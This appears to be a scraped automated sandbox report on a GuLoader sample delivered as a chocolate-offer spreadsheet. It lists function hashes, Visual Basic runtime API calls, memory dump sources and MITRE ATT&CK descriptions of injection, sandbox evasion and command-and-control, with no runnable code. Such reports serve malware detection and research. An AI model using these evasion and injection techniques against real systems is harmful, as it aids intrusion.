Opcode ID: aea13a42c57d636ca3cff0a26ec025f06585ece3f3bf6f9243fe770aa63fd7b8
Instruction ID: a5c3244ddf99c3d1595ba39d0f508f53b1889b294a8941675a5f67733426c2e9
Opcode Fuzzy Hash: aea13a42c57d636ca3cff0a26ec025f06585ece3f3bf6f9243fe770aa63fd7b8
Instruction Fuzzy Hash: 46612471B90689DFDB348E28CCA47DA77E6BF45310F95812AEC4CAB340D7309E958B80

Uniqueness

Uniqueness Score: -1.00%

Function 002E2455, Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00274ef138eb723b928bf0ded89fb7a2bb62f6aa9ce4e5a058b0895f9823da06
Instruction ID: e835432fcd0ec9d591d1aa67cb9807b4b0a616266546479a9c197d6f363710d8
Opcode Fuzzy Hash: 00274ef138eb723b928bf0ded89fb7a2bb62f6aa9ce4e5a058b0895f9823da06
Instruction Fuzzy Hash: 77610171644389DFDB348E29CD653EAB7A2AF95310F91403EAC8ED7244D7308A86CB06

Uniqueness

Uniqueness Score: -1.00%

Function 002E05B1, Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9063d224057fbabbf4c369b302a0ef3c6913cb5cd0e129926b3a9149a28b44d3
Instruction ID: 88da72014f649ac7e67c772a51460a6553a35a919d0de2e940c5ccd49479cb91
Opcode Fuzzy Hash: 9063d224057fbabbf4c369b302a0ef3c6913cb5cd0e129926b3a9149a28b44d3
Instruction Fuzzy Hash: 2E519C72A64355DFDB246E75CC913EA7BB1AF563A0F95062DDCC5C7200E3B18982CB82

Uniqueness

Uniqueness Score: -1.00%

Function 002E2518, Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22eb534dd5e0afdfaf5406c750823696b056dab4a061b267fe35b930f4971711
Instruction ID: a5b5fa0acb71f583d7c271259912f9b5b0eb55ae051b178ab9350a3421c202aa
Opcode Fuzzy Hash: 22eb534dd5e0afdfaf5406c750823696b056dab4a061b267fe35b930f4971711
Instruction Fuzzy Hash: A45125766542899FCF348E38DC643EAB7A3AF95320FA1013EAC5EC7245C7709E42CA15

Uniqueness

Uniqueness Score: -1.00%

Function 002E1A78, Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 816513b41f483079833b902bff62bd920586250a5b3a0141946ebb59520b4f67
Instruction ID: 938c978f86ec2e5b57b47c14e52720ac0b458d5dccd6c980d757f236d8349b14
Opcode Fuzzy Hash: 816513b41f483079833b902bff62bd920586250a5b3a0141946ebb59520b4f67
Instruction Fuzzy Hash: 9F512772A113988FCB359E24CD64BDE7BA2BF99760F96012EEC8DA7200D3319D41CB15

Uniqueness

Uniqueness Score: -1.00%

Function 002E80A4, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d20da4d3af8f087b45d18d037624093526d3dfd6ffb998e90fe3d0473beeacaf
Instruction ID: f352fd57559c852f616133d3b45ac1eb2ea9995cb0ef2b1fcb01dbbf3ea468e2
Opcode Fuzzy Hash: d20da4d3af8f087b45d18d037624093526d3dfd6ffb998e90fe3d0473beeacaf
Instruction Fuzzy Hash: AD5106715187C98ECF35DF3898A83EA7BA1AF26320F84825DC8CE8E2C6D7354145CB16

Uniqueness

Uniqueness Score: -1.00%

Function 002E3A18, Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e95eb92afd3799edb4a42943fde9e10bb2446b892686d9b8820b2b7e050d26ab
Instruction ID: a033e515972619d93416c9c48aa86385fda45284fa67380d19cad8bc634486d1
Opcode Fuzzy Hash: e95eb92afd3799edb4a42943fde9e10bb2446b892686d9b8820b2b7e050d26ab
Instruction Fuzzy Hash: F651E9726553859FDB30CE2B89D57E673F36F98701FA4422EC84D9B244C336AA51CB05

Uniqueness

Uniqueness Score: -1.00%

Function 002E163B, Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4be56e0571451d356beeeb4413e8465e7867a145a5b1182a4ddb6e90f709934f
Instruction ID: cc1f4bf9827283613581f49323d5bd527c316eb20884982c16f9fb607331d97f
Opcode Fuzzy Hash: 4be56e0571451d356beeeb4413e8465e7867a145a5b1182a4ddb6e90f709934f
Instruction Fuzzy Hash: 3D512520509BC79BD7228F3C88197EBBF616F53364F9983AD88984B1C6C3355456C782

Uniqueness

Uniqueness Score: -1.00%

Function 002E80C6, Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b62e8b07eba8ac5c5f70aa7849d5570c560046a81ec4528034d712c217d5f5c
Instruction ID: 1ced6c28060acf3208c46e60ea2a24966e1d3f71be6fd727ef4131b080ad156e
Opcode Fuzzy Hash: 9b62e8b07eba8ac5c5f70aa7849d5570c560046a81ec4528034d712c217d5f5c
Instruction Fuzzy Hash: 055115715183C98BCF35DF349CA47E67BA1AF26360F84826DDD8E8E286DB354540CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 002E80EF, Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fee0e77f9429489db36a746eaf61f560021145739d4caaa542e9be68710563b7
Instruction ID: fa437a2c509f796cd589309c2c966cd0084f3c233d97f9705c9a6d2e3220459b
Opcode Fuzzy Hash: fee0e77f9429489db36a746eaf61f560021145739d4caaa542e9be68710563b7
Instruction Fuzzy Hash: E851A3715087C98FCF75DF3898A47EA7BA1AF66360F84825DC88E8E2C6D7344541CB16

Uniqueness

Uniqueness Score: -1.00%

Function 002E3A69, Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaef29a3f240763d16a94f8fa319912192dbc2b7e5de2f79e43fe868d855d568
Instruction ID: 58c9829e9780100656b9961429fe68fee68cb644556b91737e3e1d231b4f6c58
Opcode Fuzzy Hash: aaef29a3f240763d16a94f8fa319912192dbc2b7e5de2f79e43fe868d855d568
Instruction Fuzzy Hash: 5041A8726457859FDF30CE2789997EA73F3AF88701FA5422AC84D9B244C336EA55CB01

Uniqueness

Uniqueness Score: -1.00%

Function 002E832E, Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7431c47b043478a39067bcfc2b890f24fb73e2fceb593a8ca8fd274ceb86fc
Instruction ID: 96bed0381fd7a5b2afbd317c1290c1245a10e5d3405336516131196deb277fba
Opcode Fuzzy Hash: 3d7431c47b043478a39067bcfc2b890f24fb73e2fceb593a8ca8fd274ceb86fc
Instruction Fuzzy Hash: 3B4157765983C5DBDF35CE39C895BEA3BA3AF85340F948069CC8D9B249D7318A418712

Uniqueness

Uniqueness Score: -1.00%

Function 002E517E, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2be1c52b4a6179c95d4887121b7e37563b231aad3a57f5eb19063ba4e79b1c7
Instruction ID: c9f5d9600f718e62e8f0741aff73775c08f28f0857bd12fcf6dcdc81f4d1634f
Opcode Fuzzy Hash: e2be1c52b4a6179c95d4887121b7e37563b231aad3a57f5eb19063ba4e79b1c7
Instruction Fuzzy Hash: FE314875A543468FDB28DE28C561BDB77E2AF45350F41841D9C8BA7250C7328A41CB11

Uniqueness

Uniqueness Score: -1.00%

Function 002E2228, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef3c7fdd781630ed164e77781e3edc6705980aa24f598744d7aa1dfc7fc79347
Instruction ID: 10ecec963bf190552057170fddad3645237944e00dd18bb0a542043721185336
Opcode Fuzzy Hash: ef3c7fdd781630ed164e77781e3edc6705980aa24f598744d7aa1dfc7fc79347
Instruction Fuzzy Hash: B321F131258388EFDB60AF718895BEFB7A6BF44394F92001DECC997120D7344A86CB06

Uniqueness

Uniqueness Score: -1.00%

Function 002E38D1, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24e47d3d9d285bbb9d0e759e86b58d03cdb2c27fd5c59be7cd631b574f131e00
Instruction ID: 6cd0bb00439d69b1644c26ae27a2cc8e1a2798560b2eadc41b1b479489f141fb
Opcode Fuzzy Hash: 24e47d3d9d285bbb9d0e759e86b58d03cdb2c27fd5c59be7cd631b574f131e00
Instruction Fuzzy Hash: 1831C6706083D58BDF76CFB885D8BCA7B90AF16214F4982ADCC998A597D3358245CB02

Uniqueness

Uniqueness Score: -1.00%

Function 002E841E, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1177fd78c677d8f7e93db0af80f187fa88576a35c51b50e60cbaccc4260fbc53
Instruction ID: 7e465184e3487ba3e7f7c4f31e7697576f99c5e4d952e0ef205bf77f2e9630a9
Opcode Fuzzy Hash: 1177fd78c677d8f7e93db0af80f187fa88576a35c51b50e60cbaccc4260fbc53
Instruction Fuzzy Hash: 732136325583C6DBDF349E3988867DABB63AF42350F998069C8CDDB185CB714645C722

Uniqueness

Uniqueness Score: -1.00%

Function 002E3D84, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53447adcc2597f5d09f7d14f8fbc5d27f57589e44d075274ee34e5b4f546ad5f
Instruction ID: 196bd53c5f2751e8a4f4807229dce7c10eec874c34a6c0884d9bd8e3792db46b
Opcode Fuzzy Hash: 53447adcc2597f5d09f7d14f8fbc5d27f57589e44d075274ee34e5b4f546ad5f
Instruction Fuzzy Hash: F41123725583549BCB686F3589623EEB7F5EF16780F46451DECD6A7280D33049888B83

Uniqueness

Uniqueness Score: -1.00%

Function 002E7106, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90ffe0555d254d947e14d687c02eb1b258e8a4230dfe6f4af41fa780d80347f6
Instruction ID: cb3ab5b95d17de59f000905b5c067445fc216f5dadcb9320e8865b5890c646b6
Opcode Fuzzy Hash: 90ffe0555d254d947e14d687c02eb1b258e8a4230dfe6f4af41fa780d80347f6
Instruction Fuzzy Hash: 04115E316A429ACFDB34DF19C8A4BDA73A6BF24B10F85406AD94CDF210C330AE50CB60

Uniqueness

Uniqueness Score: -1.00%

Function 002E504C, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92bb562e77a43175a078add7583b01ddce9d739d5cc74ca3e919f93824f3e310
Instruction ID: 6682de81b510e56234623ee8faa750cec3f52fff5b2b661f310518eaad6beb98
Opcode Fuzzy Hash: 92bb562e77a43175a078add7583b01ddce9d739d5cc74ca3e919f93824f3e310
Instruction Fuzzy Hash: 47C048B27405809FEA02CE18CA81B4473B2AB65A88B4A48D0E4028B692E324EE00CA00

Uniqueness

Uniqueness Score: -1.00%

Function 002E542E, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baa61e4ea33845613edbb69ca0e46ba2056dbbc26127de28bfb3b14c5f4af734
Instruction ID: 1a5f56ecc83045123e946bf988d26aa586c836b0368b15a4188b82a89b20d4b0
Opcode Fuzzy Hash: baa61e4ea33845613edbb69ca0e46ba2056dbbc26127de28bfb3b14c5f4af734
Instruction Fuzzy Hash: EBA002865403995BD1020A409B643C566871B472B2DBA447055852714266DA878D5400

Uniqueness

Uniqueness Score: -1.00%

Function 002E6B69, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6272081b924cc0520a84a7928bef81a9e8b0ab88ce8fcd5f3fb1f35c65d0513b
Instruction ID: 42b303bc188979856c4e877d788fe827723275c7d554067cdf8c2c8365824780
Opcode Fuzzy Hash: 6272081b924cc0520a84a7928bef81a9e8b0ab88ce8fcd5f3fb1f35c65d0513b
Instruction Fuzzy Hash: C1B00279655A409FDA95CB19C194E4077A4B745A50B515490E4119BB15C264E904CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00432954, Relevance: 39.2, APIs: 26, Instructions: 198COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 004329AC
__vbaNew2.MSVBVM60(0042F964,00434454), ref: 004329C3
__vbaHresultCheckObj.MSVBVM60(00000000,0266F6F4,0042F954,00000014), ref: 004329E8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042F9AC,00000130), ref: 00432A18
__vbaStrMove.MSVBVM60(00000000,?,0042F9AC,00000130), ref: 00432A26
__vbaFreeObj.MSVBVM60(00000000,?,0042F9AC,00000130), ref: 00432A2E
#560.MSVBVM60(?), ref: 00432A3E
__vbaFreeVar.MSVBVM60(?), ref: 00432A54
__vbaNew2.MSVBVM60(0042F964,00434454,?), ref: 00432A74
__vbaHresultCheckObj.MSVBVM60(00000000,0266F6F4,0042F954,00000014), ref: 00432A94
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042F9AC,00000130), ref: 00432ABD
__vbaStrMove.MSVBVM60(00000000,?,0042F9AC,00000130), ref: 00432ACB
__vbaFreeObj.MSVBVM60(00000000,?,0042F9AC,00000130), ref: 00432AD3
__vbaNew2.MSVBVM60(0042F964,00434454), ref: 00432AEA
__vbaObjVar.MSVBVM60(?), ref: 00432AFB
__vbaObjSetAddref.MSVBVM60(?,00000000,?), ref: 00432B05
__vbaHresultCheckObj.MSVBVM60(00000000,0266F6F4,0042F954,00000010), ref: 00432B1C
__vbaFreeObj.MSVBVM60(00000000,0266F6F4,0042F954,00000010), ref: 00432B24
__vbaNew2.MSVBVM60(0042FCF0,00434010,?), ref: 00432B3C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00432B54
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F99C,00000198), ref: 00432B7A
__vbaFreeObj.MSVBVM60(00000000,00000000,0042F99C,00000198), ref: 00432B88
__vbaFreeStr.MSVBVM60(00432BCE), ref: 00432BB0
__vbaFreeStr.MSVBVM60(00432BCE), ref: 00432BB8
__vbaFreeStr.MSVBVM60(00432BCE), ref: 00432BC0
__vbaFreeVar.MSVBVM60(00432BCE), ref: 00432BC8

Memory Dump Source

Source File: 00000006.00000002.2388784272.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2388779106.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2388817450.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2388822052.0000000000435000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$Move$#560AddrefCopy
String ID:
API String ID: 4235209719-0
Opcode ID: dc94613d244f8cc90b82b270987e0c3f68574467d8f4b31c05f9ea13f7054625
Instruction ID: e0a53f085f6a5ed97cc7650860fd447c48f529b9b77e63bf8bd6ac0d90ec1ae0
Opcode Fuzzy Hash: dc94613d244f8cc90b82b270987e0c3f68574467d8f4b31c05f9ea13f7054625
Instruction Fuzzy Hash: 95618070E00219ABCB14FFA6D985EDEBBB8AF08304F50447EF115F71A1DA786909CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00432743, Relevance: 28.7, APIs: 19, Instructions: 151COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0042FCF0,00434010), ref: 0043278F
__vbaObjSet.MSVBVM60(?,00000000), ref: 004327A7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042FB58,00000134), ref: 004327E3
__vbaFreeObj.MSVBVM60(00000000,00000000,0042FB58,00000134), ref: 004327EB
#696.MSVBVM60(0042FB6C), ref: 004327F5
#704.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,0042FB6C), ref: 0043281B
__vbaStrMove.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,0042FB6C), ref: 00432825
__vbaFreeVar.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,0042FB6C), ref: 0043282D
__vbaNew2.MSVBVM60(0042FCF0,00434010,?,000000FF,000000FE,000000FE,000000FE,0042FB6C), ref: 00432845
__vbaObjSet.MSVBVM60(?,00000000), ref: 0043285D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F99C,00000170), ref: 00432883
#529.MSVBVM60(00000002), ref: 0043289D
__vbaFreeObj.MSVBVM60(00000002), ref: 004328A5
__vbaFreeVar.MSVBVM60(00000002), ref: 004328AD
__vbaNew2.MSVBVM60(0042FCF0,00434010,0042FB6C), ref: 004328C5
__vbaObjSet.MSVBVM60(?,00000000), ref: 004328DD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9DC,00000058), ref: 004328FD
__vbaFreeObj.MSVBVM60(00000000,00000000,0042F9DC,00000058), ref: 0043290B
__vbaFreeStr.MSVBVM60(00432939), ref: 00432933

Memory Dump Source

Source File: 00000006.00000002.2388784272.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2388779106.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2388817450.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2388822052.0000000000435000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultNew2$#529#696#704Move
String ID:
API String ID: 640063502-0
Opcode ID: 0f76bd054df706205ed51dec6e9ed3ee306bdeff0ddcb91e7331c7555fbdb1d0
Instruction ID: 1e2ff1b58aed05f94dc31783988c8574996fb186c0df54be1a7295b641757b08
Opcode Fuzzy Hash: 0f76bd054df706205ed51dec6e9ed3ee306bdeff0ddcb91e7331c7555fbdb1d0
Instruction Fuzzy Hash: EF512B70A00218ABCB14EBA6DD85FEE77B8AF18704F50027EF511F71E1D77869058A68

Uniqueness

Uniqueness Score: -1.00%

Function 00432E33, Relevance: 24.2, APIs: 16, Instructions: 172COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0042F964,00434454), ref: 00432E7B
__vbaHresultCheckObj.MSVBVM60(00000000,0266F6F4,0042F954,00000014), ref: 00432E9F
__vbaNew2.MSVBVM60(0042FCF0,00434010), ref: 00432EC8
__vbaObjSet.MSVBVM60(?,00000000), ref: 00432EE0
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042FA54,0000013C), ref: 00432F06
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042F9AC,0000013C), ref: 00432F35
__vbaFreeStr.MSVBVM60 ref: 00432F3D
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00432F4E
__vbaNew2.MSVBVM60(0042FCF0,00434010), ref: 00432F69
__vbaObjSet.MSVBVM60(?,00000000), ref: 00432F81
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F99C,000001D0), ref: 00432FB9
__vbaFreeObj.MSVBVM60 ref: 00432FC1
__vbaNew2.MSVBVM60(0042FCF0,00434010), ref: 00432FD9
__vbaObjSet.MSVBVM60(?,00000000), ref: 00432FF1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042FA04,00000078), ref: 00433011
__vbaFreeObj.MSVBVM60 ref: 0043301F

Memory Dump Source

Source File: 00000006.00000002.2388784272.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2388779106.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2388817450.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2388822052.0000000000435000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2$List
String ID:
API String ID: 3473554973-0
Opcode ID: d8fc1e97a8124da63c7165a91673e195d5dd7a13890d36ae498410e8abec7654
Instruction ID: 90094902804c8d869a39f63203a35e52884b7f5142c287b24208c0286d162330
Opcode Fuzzy Hash: d8fc1e97a8124da63c7165a91673e195d5dd7a13890d36ae498410e8abec7654
Instruction Fuzzy Hash: B0516070A00214ABCB14EFA6DD86FEF77B8AF19704F50046AF510F7191D6B8A9058B68

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

